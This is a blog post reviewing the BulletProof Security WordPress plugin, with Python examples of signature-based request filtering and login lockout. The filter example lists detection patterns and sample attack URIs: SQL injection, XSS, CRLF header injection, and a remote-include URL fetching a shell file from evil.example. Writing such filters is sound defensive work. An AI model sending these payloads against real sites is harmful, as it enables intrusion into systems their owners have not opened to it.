The Internet Is a Dangerous Place
Today, having a website on the internet is like taking a walk through Jurassic Park with a couple of pounds of raw meat wrapped around your neck. If you don’t do something, and do it quickly, at the very least you are likely to get bitten, and most probably devoured. Let’s use this site as an example. The site is small; in comparison to the number of daily users at Amazon, LarryTalksTech is hardly “used” at all. Though there is some advertising, LarryTalksTech only provides technical information, for free. As a result, there are no credit card transactions, bitcoins, or anything else of any monetary substance. Sure, the site has original documents and photos, the writings themselves are copyrighted, it’s all “intellectual property”, and so on, but a user can view and read anything on it, once again, for FREE. Why then would anyone go through the trouble of hacking the site? Once inside, there is really nothing of any substantive value that could be turned into cash. All that being said, during the first 8 days of this month, my security logs show there have been nearly 200 attempts to hack the site, three attempts at brute-force logins, and attempts to appropriate 14% of my bandwidth via hot-linking. Some of this is being done by “bots”, and some of it has been done by, well… actual people. Who cares how the attacks are implemented; the fact is that the attacks are there, and very real. Considering the number of attacks LarryTalksTech has had, and the type of site it is, I shudder to think about the quantity of attacks a site would get if it were commercial, with credit card info, client lists, mailing lists, etc.
In all the years I have had this website, I have tried and taken many steps to secure it. I have found that securing a website is an ongoing process, as there always seem to be new and better ways to beat whatever security tools or processes have been implemented. A very good way to “hedge your bet” and increase the security of your website is to use a security plugin. LarryTalksTech is built using WordPress. Because WordPress is so widely used, there are a lot of security plugins available for it. I have tried a number of them. One had my site so secure that even I couldn’t log into it. Fortunately, there is one plugin that I found, and have now used for several years, that eclipses anything else I have tried: BulletProof Security.
BulletProof Security Features
BulletProof Security is probably as close to an all-around security solution for your website as you will be able to find. BulletProof Security (or BPS) does not rely on a “silver bullet” (meaning one solution); it secures the website using a number of approaches. From the developer, here is an exhaustive list of its features for the current version:[1]
BulletProof Security
WordPress Website Security Protection: Firewall Security, Login Security, Database Security… Effective, Reliable, Easy to use…
BulletProof Security Feature Highlights
• .htaccess Website Security Protection (Firewalls)
• Login Security & Monitoring
• DB Backup – Manual and Scheduled
• DB Backup Logging
• DB Table Prefix Changer
• Security Logging
• HTTP Error Logging
• FrontEnd/BackEnd Maintenance Mode
• UI Theme Skin Changer
BulletProof Security Pro Feature Highlights
• 1 Click Setup Wizard
• AutoRestore Intrusion Detection & Prevention System (IDPS)
• Quarantine Intrusion Detection & Prevention System (IDPS)
• Real-time File Monitor (IDPS)
• DB Monitor Intrusion Detection System (IDS)
• DB Diff Tool – data comparison tool
• DB Backup – Manual and Scheduled
• DB Status & Info – extensive database status & info
• Plugin Firewall (True IP Based Firewall)
• JTC Anti-Spam / Anti-Hacker
• Uploads Folder Anti-Exploit Guard (UAEG)
• .htaccess Website Security Protection (Firewalls)
• Custom php.ini Website Security
• Login Security & Monitoring
• Dashboard Alerting / Status Display & additional options/features
• F-Lock – Read Only File Locking
• FrontEnd/BackEnd Maintenance Mode
• Security Logging
• HTTP Error Logging
• PHP Error Logging
• DB Monitor Logging
• DB Backup Logging
• DB Table Prefix Changer
• AutoRestore/Quarantine Logging
• S-Monitor – Monitoring & Alerting Core
• Pro Tools – 16 mini-plugins
• Heads Up Dashboard Status Display
• UI Theme Skin Changer
BulletProof Security One-Click Method vs Multiple Separate Option Settings
BulletProof Security uses a one-click setup method vs breaking up options and settings into multiple separate different options and settings. One-click is used figuratively and not literally. One-click is the concept where several tasks are performed with one-click of a button. BPS BulletProof Modes setup actually takes 4 clicks, but with those 4 clicks BPS BulletProof Modes are setup and the website has maximum security enabled with all BPS security features and code enabled instead of having to choose multiple separate options and settings. Customization, whitelisting, adding BPS Bonus Custom Code or adding other personal custom .htaccess code is done with the BPS Custom Code feature.
htaccess Core Website Security (Security/Firewalls)
WordPress Website Security Protection: BulletProof Security protects your website against 100,000s of different hacking attempts/attacks. The .htaccess security filters in BulletProof Security are designed to match malicious and nuisance attack patterns. The most important benefit of using a finite pattern matching method vs infinite banning/blocking of individual IPs, Hosts, Referers, etc. is that your website performance and Server resources are not negatively impacted. In general, BulletProof Security takes an “Action Approach” to website security. Hacker X, Spammer X, Bad Bot X does bad Action Y = Forbidden/Blocked. An “Action Approach” is a much more effective and performance optimized approach to website security since the bad action itself is being blocked/forbidden instead of attempting to block an individual hacker/spammer that performed a bad action. Example: BulletProof Security blocks all SQL Injection hacking attempts/attacks no matter who performed that SQL Injection hacking attempt/attack.
Login Security & Monitoring Website Security (Security/Monitoring)
Login Security & Login Monitoring: Log All User Account Logins or Log Only User Account Lockouts (see Screenshot). Brute Force Login Security Protection. Email alerting options allow you to choose 5 different email alerting options: Choose to have email alerts sent when a User Account is locked out, An Administrator Logs in, An Administrator Logs in and when a User Account is locked out, Any User logs in and when a User Account is locked out or Do Not Send Email Alerts. Choose Standard WP Error Messages or Generic Error Messages for Login Security Stealth Mode. Choose to Enable or Disable Login Password Reset capability for Login Security Stealth Mode. See BulletProof Security Login Security & Monitoring Features for additional features and options.
DB Backup: Database Backup Website Security (Security/Backup)
DB Backup: Create manual and scheduled Backup Jobs. Selective database table backup and full database backup. Scheduled backup job options: Hourly, Daily, Weekly and Monthly. Send scheduled backup zip file via email or just send email only, automatically delete old backup files after a certain period of time, etc., etc., etc. All DB Backup options/settings and default setup is done automatically during upgrades and new installations.
BulletProof Security is Website Performance Optimized (Performance/Optimization)
Website performance is just as important as website security. BulletProof Security is website performance optimized with website owners’ best interests at heart. BulletProof Security does NOT abuse the WordPress Database by making excessive MySQL Queries. BulletProof Security does NOT store excessive & non-essential data in your WordPress Database. BulletProof Security does NOT use excessive Server Memory & Resources. BulletProof Security does NOT use any gimmicks or bells & whistles that will cost website owners their website performance. The benefits of having website security protection are negated if your website is performing poorly/slowly, continually experiencing out of memory errors/running out of memory, database size growing exponentially with non-essential stored data, etc. BulletProof Security can actually speed up & improve your website performance by using the Speed Boost Cache Bonus Code. See the BulletProof Security Bonus Custom Code help section below.
FrontEnd/BackEnd Maintenance Mode (Security/Development)
Display a website under maintenance page with Countdown Timer to website visitors while the website displays and functions normally for you. When the Countdown Timer has completed (reached 0) an email reminder is sent to you to remind you that the Countdown Timer has completed. The new BPS Maintenance Mode design includes 20 background images, 15 center images (text box image), allows you to embed image files and YouTube videos, FrontEnd Maintenance Mode, BackEnd Maintenance Mode or both FrontEnd & BackEnd Maintenance Modes and most importantly is fast and simple to use so that you can switch in and out of Maintenance mode quickly and easily. FrontEnd Maintenance mode is primarily designed for development/maintenance purposes and BackEnd Maintenance Mode is technically a security feature since enabling BackEnd Maintenance Mode allows you to deny access to the /wp-admin folder/WP Dashboard by IP address. See BulletProof Security FrontEnd/BackEnd Maintenance Mode Features for additional features and options.
Why .htaccess Website Security Is So Much Better Than Other Types of Website Security
The answer is very simple – .htaccess files (distributed Server configuration files) are processed first, before any other code on your website. In other words, hackers’ malicious scripts are stopped by BulletProof Security .htaccess files/Firewalls before those scripts even have a chance to reach the PHP code in WordPress. BulletProof Security uses .htaccess website security files, which are specific to Apache Linux Servers. Please read the FAQ page for Server compatibility questions.
BulletProof Security Additional Website Security Protection
WordPress is already very secure, but every website, no matter what type of platform it is built on should have additional website security measures in place as a standard. BulletProof Security provides that additional website security protection that every website should have.
Translations
• Lithuanian by Vincent G from Host1Free.com
• Filipino/Tagalog by pointen.dk
• Russian by EyeFinity
• If you would like to translate the BPS plugin to your language see this BPS Plugin Language Translation Tutorial. Please include a link to your website so that we can add it here. Thank you.
• Tip: If you use the Google Chrome Browser you can right mouse click in plugin pages and then click on Translate to… To translate plugin text into your Language.
BulletProof Security Bonus Custom Code
• Brute Force Login Protection .htaccess Code
• Speed Boost Cache .htaccess Code
• HotLink Protection .htaccess Code – Google, Yahoo, Bing safe
• Author ID / Username Bot Probe Protection .htaccess Code
• XML-RPC DDoS Protection .htaccess Code (Double Bonus: Trackback/Pingback Protection)
BulletProof Security htaccess Core (Firewalls, etc.) Features
• Root Folder BulletProof Mode/Firewall
• wp-admin Folder BulletProof Mode/Firewall
• Built-in .htaccess File Editor & File Manager
• Built-in .htaccess Backup and Restore
• One-click .htaccess website security protection from within the WP Dashboard
• .htaccess security protection against XSS, RFI, CRLF, CSRF, Base64, Code Injection and SQL Injection… hacking attempts
• TimThumb Vulnerability/Exploit .htaccess security protection (Firewall)
• .htaccess Lock / Unlock (404 Read-Only)
• .htaccess AutoLock On or Off
• Security / HTTP Error Logging – Log 400, 403 and 404 Errors
• Security Log: Add / Remove User Agents/Bots to Ignore/Not Log or Allow/Log
• Security Log: Turn On / Turn Off / Delete Log
• Security Log Automation: Automatically zipped, emailed and replaced based on file size
• Automatic .htaccess file updating on BPS upgrade installation
• New .htaccess security filters automatically added during upgrade
• WP Dashboard Alerts / WP Dashboard Dismiss Notices
• Anti Comment Spam .htaccess code – works together with Akismet or other Spam plugins to keep Comment Spam at a minimum
• Anti Comment Spambot .htaccess code – Forbid Empty Referrer Spambots
• Author ID / User ID / Username Bot Probe Protection
• Custom Code feature: Add, Edit, Modify, Save additional Bonus or personal custom .htaccess code
• WordPress readme.html and /wp-admin/install.php protected with .htaccess security protection
• wp-config.php and bb-config.php files protected with .htaccess security protection
• php.ini and php5.ini files protected with .htaccess security protection
• WordPress database errors turned off – Verification and function insurance
• WordPress version is not displayed / not shown – WordPress version is removed
• WP Generator Meta Tag filtered – not displayed / not shown
• WP DB default admin username / account check
• System Info: PHP, MySQL, OS, Server, Memory Usage, IP, SAPI, WP Filesystem API Method, DNS, Max Upload, Zend Engine Version, Zend Guard/Optimizer, ionCube Loader, Suhosin, APC, eAccelerator, XCache, Varnish, cURL, Memcache, Memcached…
• Security Status Page – Displays website security status information
• File and Folder Permission Checking – CGI / DSO – SAPI check / display
• Help & FAQ page – links to BPS Guide and other detailed Help & Info pages
• Extensive Read Me! jQuery Dialog Help buttons throughout the BulletProof Security plugin pages
• Website Developer Maintenance Mode (503 website open to Developer / Site Owner ONLY)
• Log in / out of your website while in Maintenance Mode
• Customizable 503 Website Under Maintenance page
• HUD Success / Error message display
• i18n Language Translation coding
BulletProof Security Login Security & Monitoring Features
• Brute Force Login Security Protection
• Log All User Account Logins or Log Only User Account Lockouts
• Logged DB Fields: User ID, Username, Display Name, Email, Role, Login Time, Lockout Expires, IP Address, Hostname, Request URI
• Email Alerting Options: User Account is locked out, An Administrator Logs in, An Administrator Logs in and when a User Account is locked out, Any User logs in and when a User Account is locked out, Do Not Send Email Alerts
• Login Security Additional Options: Max Login Attempts, Automatic Lockout Time, Manual Lockout Time, Max DB Rows To Show, Turn On/Turn Off
• Login Security Stealth Mode: Standard WP Error Messages or Generic Error Messages.
• Login Security Stealth Mode: Enable or Disable Login Password Reset capability and links.
• Dynamic DB Form: Lock, Unlock, Delete
• Enhanced Search: Allows you to search all of the Login Security database rows/Fields
• Click the Login Security Read Me help button for full descriptions of all features and options.
BulletProof Security DB Backup/Database Backup Features
• Manual or scheduled database backups
• Scheduled backup job options: Hourly, Daily, Weekly and Monthly
• Send scheduled backup zip file via email or just send email only
• Selective database table backup and full database backup
• Automatic deletion of old backup files after a certain period of time
• Backup Jobs – Manual/Scheduled Accordion Tab
• Displays the Description/Job Name, Delete and Run Checkboxes, Job Type, Frequency, Last Backup, Next Backup, Email Backup and Job Created table columns.
• Backup Files – Download/Delete Accordion Tab
• Displays the Backup Filename, Delete Checkbox, Download Links, Backup Folder, Size and Date/Time table columns.
• Create Backup Jobs Accordion Tab
• Displays a dynamic DB Table Name checkbox form, Description/Backup Job Name, DB Backup Folder Location (default Obfuscated & Secure BPS Backup Folder location), DB Backup File Download Link/URL, Backup Job Type: Manual or Scheduled, Frequency of Scheduled Backup Job (recurring – Hourly, Daily, Weekly or Monthly), Hour When Scheduled Backup is Run (recurring – start time for a scheduled backup job), Day of Week When Scheduled Backup is Run (recurring – weekday day), Day of Month When Scheduled Backup is Run (recurring – day of the month), Send Scheduled Backup Zip File Via Email or Just Email Only – email zip backup file, do not email backup zip file, email and delete zip backup file or just send an email, Automatically Delete Old Backup Files (Never delete old backup files, delete backup files older than 1 day, 5 days, 10 days, 15 days, 30 days, 60 days, 90 days or 180 days), – Turn On/Off All Scheduled Backups (override – turn on all scheduled backups or turn off all scheduled backups).
• DB Backup Logging
• Depending on your DB Backup settings, log entries will be logged anytime you run a Manual Backup Job or whenever a Scheduled Cron Backup Job is run. The Backup Job Completion Time, Zip Backup File Name, timestamp and other information is logged. If you have chosen the option to automatically delete old zip backup files then the zip backup file name and timestamp will be logged when old zip backup files are automatically deleted. When you create a new Backup Job your Backup Job Settings are logged/saved in the DB Backup Log.
• DB Backup Log Automation: Automatically zipped, emailed and replaced based on file size
• Click the DB Backup Read Me help button for full descriptions of all features and options.
BulletProof Security FrontEnd/BackEnd Maintenance Mode Features
• FrontEnd Maintenance Mode, BackEnd Maintenance Mode or both FrontEnd & BackEnd Maintenance Modes
• Website displays & functions normally while visitors see a website under maintenance page
• TinyMCE WYSIWYG Editor
• Embed image files and YouTube videos
• 20 background images, 15 center images (text box image)
• Background image files/options and Center images (text box image) are independent of each other so that you can mix and match different background images with different Center images (text box image)
• Enable Countdown Timer
• Countdown Timer Text Color
• Maintenance Mode Time in Minutes
• Header Retry-After in Minutes ~ 503 HTTP Status Code
• Enable FrontEnd Maintenance Mode ~ site development, maintenance, coming soon, under construction, etc.
• Enable BackEnd Maintenance Mode ~ Deny All IP address .htaccess protection for the wp-admin folder / WP Dashboard
• Maintenance Mode IP Address Whitelist Text Box: Enter The IP Addresses That Can View The Website Normally (not in Maintenance Mode)
• Maintenance Mode Text, Images, Videos Displayed To Website Visitors
• Background Images ~ 20 background images ~ mix and match with center images ~ see screenshot
• Center Images ~ 15 center images ~ mix and match with background images ~ see screenshot
• Background Colors (If not using a Background Image)
• Display Visitor IP Address
• Display Admin/Login Link
• Display Dashboard Reminder Message when site is in Maintenance Mode
• Send Email Reminder when Maintenance Mode Countdown Timer has completed
• Email: To, From, cc, bcc
• Network/Multisite Primary Site Options ONLY
• Put The Primary Site And All Subsites In Maintenance Mode
• Put All Subsites In Maintenance Mode, But Not The Primary Site
• Click the Maintenance Mode Read Me help button for full descriptions of all features and options.
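The “Action Approach” and the .htaccess filter categories in the developer’s text above (XSS, RFI, CRLF, Base64, code injection, SQL injection) are, at heart, pattern matching over the request before it ever reaches WordPress. The Python below is an added example written for this article, not the plugin’s own code or rules: it implements a small version of that filter and runs it over constructed request URIs, returning 403 for any request that matches a signature regardless of which IP address sent it. The signatures, the sample URIs, the sample IP address and the log line format are all assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed, deliberately small signature set for the attack categories the
# feature list names (SQL injection, XSS, RFI, CRLF, base64 payloads). These are
# illustrative patterns written for this example, not the plugin's own rules.
SIGNATURES = [
    ("sqli",   re.compile(r"union\s+select|\bor\s+1\s*=\s*1\b|information_schema|;\s*drop\s+table", re.I)),
    ("xss",    re.compile(r"<script|javascript:|onerror\s*=", re.I)),
    ("rfi",    re.compile(r"[?&][a-z_]+=(?:https?|ftp)://", re.I)),
    ("crlf",   re.compile(r"%0d|%0a|[\r\n]", re.I)),
    ("base64", re.compile(r"base64_(?:en|de)code\s*\(", re.I)),
]


@dataclass
class Verdict:
    status: int              # 200 = pass through to WordPress, 403 = Forbidden
    category: Optional[str]  # signature that fired, or None


def decode_uri(uri: str) -> str:
    # Decode twice so one extra layer of percent-encoding does not hide a payload.
    return unquote_plus(unquote_plus(uri))


def check_request(request_uri: str) -> Verdict:
    """Action approach: the bad request is blocked no matter who sent it.

    Both the raw and the decoded URI are scanned, so %0d/%0a are caught before
    decoding and percent-encoded payloads are caught after it.
    """
    haystack = request_uri + " " + decode_uri(request_uri)
    for category, pattern in SIGNATURES:
        if pattern.search(haystack):
            return Verdict(403, category)
    return Verdict(200, None)


def security_log_line(ip: str, when: str, uri: str, verdict: Verdict) -> str:
    # One-line record in the spirit of a firewall security log entry.
    return f"{when} {ip} {verdict.status} {verdict.category or '-'} {uri}"


# Constructed sample request URIs: two ordinary, five matching a category.
SAMPLE_REQUESTS = [
    "/2019/03/some-post/",
    "/?s=wordpress+security",
    "/?id=1%20UNION%20SELECT%201,2,3",
    "/?id=%2527%2520OR%25201%253D1",      # double-encoded ' OR 1=1
    "/?q=%3Cscript%3Ealert(1)%3C/script%3E",
    "/index.php?page=http://evil.example/shell.txt",
    "/?redirect=%0d%0aSet-Cookie:x=1",
]


def filter_requests(uris: List[str]) -> List[Tuple[str, int, Optional[str]]]:
    results = []
    for uri in uris:
        verdict = check_request(uri)
        results.append((uri, verdict.status, verdict.category))
    return results


if __name__ == "__main__":
    # Constructed source address and timestamp for the printed log lines.
    for uri, status, category in filter_requests(SAMPLE_REQUESTS):
        print(security_log_line("203.0.113.7", "2020-01-08T09:00:00Z", uri,
                                Verdict(status, category)))
```

Two points are worth noticing. First, the filter scans both the raw and the twice-decoded URI, because an encoded payload looks harmless until it is decoded, while a CRLF sequence looks harmless after it is. Second, a finite pattern set will occasionally match a legitimate request (a post slug that happens to contain “union select”, say), which is why a plugin of this kind logs every 403 and offers a whitelist/custom-code mechanism; check the security log for 403s on your own URLs before trusting a new rule. A real .htaccess rule set also runs before PHP starts, which is the performance point the developer makes; this script only illustrates the matching logic.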
Summary
From the developer data above, you can see that BulletProof Security is a very broad-based security tool for your website. In addition to the many things it can do to protect your website, it also provides suggestions, like changing the permission settings (as well as providing the “ideal” settings) on key WordPress files. Finally, BPS provides two logs that I use daily: The Login Security Log displays who has logged in, and who has been locked out of the website after reaching a maximum number of unsuccessful login attempts. In addition, the time of the login or attempted login is shown, as well as the IP address from which the person is attempting the login. The Security Log displays all blocked attempts to access the website, along with the reason, IP address, time, etc.
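As an added illustration of the lockout logic behind the Login Security Log described above (example code written for this article, not BulletProof Security’s implementation), the Python below counts failed logins per user account, locks the account once “Max Login Attempts” is reached for an “Automatic Lockout Time”, and records the fields the developer’s feature list says are logged. The default thresholds, the sample IP addresses and the event sequence are constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple


@dataclass
class LoginRecord:
    # Mirrors the per-event fields the feature list says are logged.
    username: str
    ip_address: str
    request_uri: str
    login_time: datetime
    event: str                                 # "login" or "lockout"
    lockout_expires: Optional[datetime] = None


class LoginSecurity:
    # Thresholds are assumed defaults for this example ("Max Login Attempts",
    # "Automatic Lockout Time"); the plugin exposes them as settings.
    def __init__(self, max_attempts: int = 3, lockout_minutes: int = 60):
        self.max_attempts = max_attempts
        self.lockout = timedelta(minutes=lockout_minutes)
        self.failures: Dict[str, int] = {}        # consecutive bad passwords per account
        self.lockouts: Dict[str, datetime] = {}   # account -> lockout expiry
        self.log: List[LoginRecord] = []

    def is_locked(self, username: str, now: datetime) -> bool:
        expires = self.lockouts.get(username)
        if expires is None:
            return False
        if now >= expires:                        # lockout has lapsed: clear state
            del self.lockouts[username]
            self.failures.pop(username, None)
            return False
        return True

    def attempt(self, username: str, password_ok: bool, ip: str,
                now: datetime, uri: str = "/wp-login.php") -> str:
        if self.is_locked(username, now):
            return "locked"                       # rejected even with the right password
        if password_ok:
            self.failures.pop(username, None)
            self.log.append(LoginRecord(username, ip, uri, now, "login"))
            return "ok"
        self.failures[username] = self.failures.get(username, 0) + 1
        if self.failures[username] >= self.max_attempts:
            expires = now + self.lockout
            self.lockouts[username] = expires
            self.log.append(LoginRecord(username, ip, uri, now, "lockout", expires))
            return "locked"
        return "failed"

    def format_log(self) -> List[str]:
        # Lines in the spirit of the Login Security Log: who, from where, when.
        lines = []
        for r in self.log:
            extra = f" expires={r.lockout_expires.isoformat()}" if r.lockout_expires else ""
            lines.append(f"{r.login_time.isoformat()} {r.event:7} {r.username} "
                         f"{r.ip_address} {r.request_uri}{extra}")
        return lines


def simulate() -> Tuple[List[str], List[str]]:
    # Constructed sequence: three bad passwords for "admin" from one address,
    # a correct password while still locked out, then a correct one after expiry.
    t0 = datetime(2020, 1, 8, 9, 0, 0)
    ls = LoginSecurity(max_attempts=3, lockout_minutes=60)
    steps = [
        ("admin", False, "203.0.113.7", t0),
        ("admin", False, "203.0.113.7", t0 + timedelta(seconds=5)),
        ("admin", False, "203.0.113.7", t0 + timedelta(seconds=10)),
        ("admin", True,  "203.0.113.7", t0 + timedelta(minutes=30)),
        ("admin", True,  "198.51.100.2", t0 + timedelta(minutes=61)),
    ]
    outcomes = [ls.attempt(*step) for step in steps]
    for line in ls.format_log():
        print(line)
    return outcomes, [r.event for r in ls.log]


if __name__ == "__main__":
    print(simulate())
```

One caveat for anyone writing or configuring this kind of control: a lockout keyed only on the username means that anybody who can send a few bad passwords can lock the real administrator out, which is a nuisance rather than a break-in but is still a denial of service. That is one reason the log keeps the source IP address and hostname alongside the username, and why whitelisting your own address (as the plugin’s BackEnd Maintenance Mode does for wp-admin) is worth setting up before you tighten the thresholds.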
I use the FREE version of BulletProof Security for my site. I have found that it not only meets the needs of my site, but has performed well for me for several years. If yours is a commercial site, the Pro version might be worth considering.
Even with BulletProof Security, I don’t for one minute believe my site is 100% secure; there are just too many variables involved in keeping it safe. In the end, security processes are mostly reactive, as there are a lot of skilled vermin out there with nothing better to do than try to exploit your system, and in the process, try new ways to carry out their task. One just has to stay vigilant and creative.
Sources
1. BulletProof Security | https://wordpress.org/plugins/bulletproof-security/